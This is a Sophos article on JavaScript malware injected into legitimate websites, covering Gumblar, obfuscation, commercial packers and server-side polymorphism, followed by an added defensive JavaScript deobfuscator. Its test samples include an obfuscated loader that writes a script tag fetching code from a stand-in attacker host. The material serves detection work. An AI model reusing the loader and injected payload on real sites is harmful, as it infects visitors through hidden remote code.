Not all malware detection is created equal

The internet is now the number-one conduit for infecting users with malware. SophosLabs reports that in 2009, 23,500 new infected web pages were being discovered every day. That is one every four seconds or so, and four times the rate seen in the same period of 2008. Malware authors have been very successful with one popular method: compromising popular, high-traffic, legitimate sites in order to kick-start the infection process.

Users visiting a hijacked site have no way of knowing that it has been compromised, because the malicious code is invisible yet executes as soon as the page loads in the user’s browser. The code typically uses cross-site scripting to fetch an even more malicious payload from a third-party site, which then attempts to leverage one of dozens of known exploits in the browser or operating system to infect the machine, steal data or subvert it into a botnet.

The scope of these attacks should not be underestimated: all types of sites—from government websites to educational establishments to popular news portals, blogs and social networking sites—have been targeted.

As security vendors add detection for this kind of malicious web code, the attackers constantly evolve it in order to evade being caught. As this game of cat and mouse intensifies, the attackers have turned to JavaScript for delivering their attacks, for two reasons:

»» JavaScript is very powerful and universal, with rich capabilities supported in all browsers and operating systems.

»» JavaScript gives them great flexibility to hide (obfuscate) the malicious code.

Consequently, proactive generic detection becomes harder to achieve. We have seen numerous mass-defacement attacks during 2009 in which tens of thousands of legitimate sites have been compromised (their pages injected with malicious JavaScript code). These attacks invariably use heavily obfuscated JavaScript as a means of evading detection for as long as possible.

A good example of this kind of attack is Gumblar, in which many sites were injected with a malicious script that used simple character substitution to hide its payload. The payload is not visible in the injected script itself, but after manual deobfuscation it is obvious: the loading of a malicious script from a remote site.

The reach of mass-defacement attacks such as Gumblar can be huge. Shortly after detection was added (as Troj/JSRedir-R), the threat rose to the top position in SophosLabs’ web threat statistics, dwarfing the other threats of the time.

Commercial script packers

There is nothing inherently malicious about obfuscating JavaScript code. In fact, commercial tools are available that developers use to obfuscate their own code, for two reasons:

»» Protection of intellectual property: developers may use such tools to obfuscate their code in an attempt to prevent others from copying it.

»» Efficiency: some tools produce smaller scripts that are quicker to download, resulting in more responsive sites.

This creates yet another problem for analysts and content scanners. When attackers use commercial tools to obfuscate their malicious scripts, anti-malware analysts have to be careful not to generate a false positive on legitimate scripts that are obfuscated with the same tool.

Server-side polymorphism (SSP)

Many of today’s threats also use advanced scripting techniques on the server in order to create polymorphic malicious code. For example, during 2009, SophosLabs identified several attacks aiming to infect users with Zbot that were aggressively using SSP. In these attacks, the malicious scripts being used to exploit vulnerabilities on user machines were dynamically created on the server, resulting in a slightly different script on each request.

SSP is essentially a special case of obfuscation, which again poses a challenge to anti-malware analysts and content scanners.
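The three points above (the Gumblar-style character substitution, the false-positive risk of commercial packers, and server-side polymorphism) share one defensive answer: decode statically and judge the decoded behaviour, not the mere presence of obfuscation. The following is an added example, not code from the Sophos article or from any Sophos product; the loader shape, the `.example` hosts and the sample scripts are all constructed for illustration.

```javascript
// Added example (not from the article): a static deobfuscator for a constructed
// "simple character substitution" loader of the kind the article attributes to
// Gumblar. The verdict rests on what the DECODED script does, so a packed but
// benign script is not a false positive, and a server-side-polymorphic variant
// (different shift per request) decodes to the same payload. All samples are
// constructed; remote hosts use the reserved .example TLD.

// Shape of the constructed loader as it would sit in an injected page:
//   eval(function(s,k){...String.fromCharCode(s.charCodeAt(i)-k)...}('<encoded>', <k>))
const LOADER_RE =
  /String\.fromCharCode\(\s*\w+\.charCodeAt\(\s*\w+\s*\)\s*([+-])\s*\w+\s*\)[\s\S]*?\}\s*\(\s*'([^'\\]*)'\s*,\s*(\d+)\s*\)\s*\)/;

// Recover the literal and the shift the loader would apply, and apply it
// ourselves instead of ever running eval() on untrusted input.
function deobfuscate(script) {
  const m = LOADER_RE.exec(script);
  if (!m) return null;                              // not this substitution scheme
  const [, op, encoded, shift] = m;
  const delta = op === '-' ? -Number(shift) : Number(shift);
  let out = '';
  for (const ch of encoded) out += String.fromCharCode(ch.charCodeAt(0) + delta);
  return out;
}

// Judge the decoded behaviour: a <script src> pointing off the page's own host is
// the remote-script load the article describes. Obfuscation alone is no verdict.
function classify(script, pageHost) {
  const decoded = deobfuscate(script);
  if (decoded === null) return { verdict: 'unknown', decoded: null, host: null };
  const m = /<script[^>]*\bsrc\s*=\s*["']https?:\/\/([^/"'\s]+)/i.exec(decoded);
  if (m && m[1].toLowerCase() !== pageHost.toLowerCase())
    return { verdict: 'suspicious', decoded, host: m[1] };
  return { verdict: 'benign', decoded, host: m ? m[1] : null };
}

// --- Constructed samples (pack() only builds test input: shift each code point by k) ---
const pack = (payload, k) =>
  "eval(function(s,k){var o='';for(var i=0;i<s.length;i++)o+=String.fromCharCode(s.charCodeAt(i)-k);return o}('" +
  [...payload].map(c => String.fromCharCode(c.charCodeAt(0) + k)).join('') + "'," + k + "))";

const INJECTED = 'document.write(\'<script src="http://evil.example/x.js"></script>\')';
const BENIGN   = "document.getElementById('clock').textContent=new Date().toLocaleTimeString()";
const SAMPLE_GUMBLAR_LIKE = pack(INJECTED, 3);    // as served on one request
const SAMPLE_SSP_VARIANT  = pack(INJECTED, 6);    // same payload, new key on the next request
const SAMPLE_PACKED_OK    = pack(BENIGN, 5);      // legitimately packed site code

for (const s of [SAMPLE_GUMBLAR_LIKE, SAMPLE_SSP_VARIANT, SAMPLE_PACKED_OK])
  console.log(classify(s, 'www.victim.example'));
```

Both polymorphic variants decode to the identical payload, which is the property a detection written against the decoded behaviour relies on, while the packed benign script comes back as benign because nothing in its decoded text loads remote code.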

This article was provided by Sophos and is reproduced here with their full permission. Sophos provides full data protection services, including security software, encryption software, antivirus and anti-malware protection.

Article Source: http://www.articlesbase.com/security-articles/not-all-malware-detection-is-created-equal-1584944.html
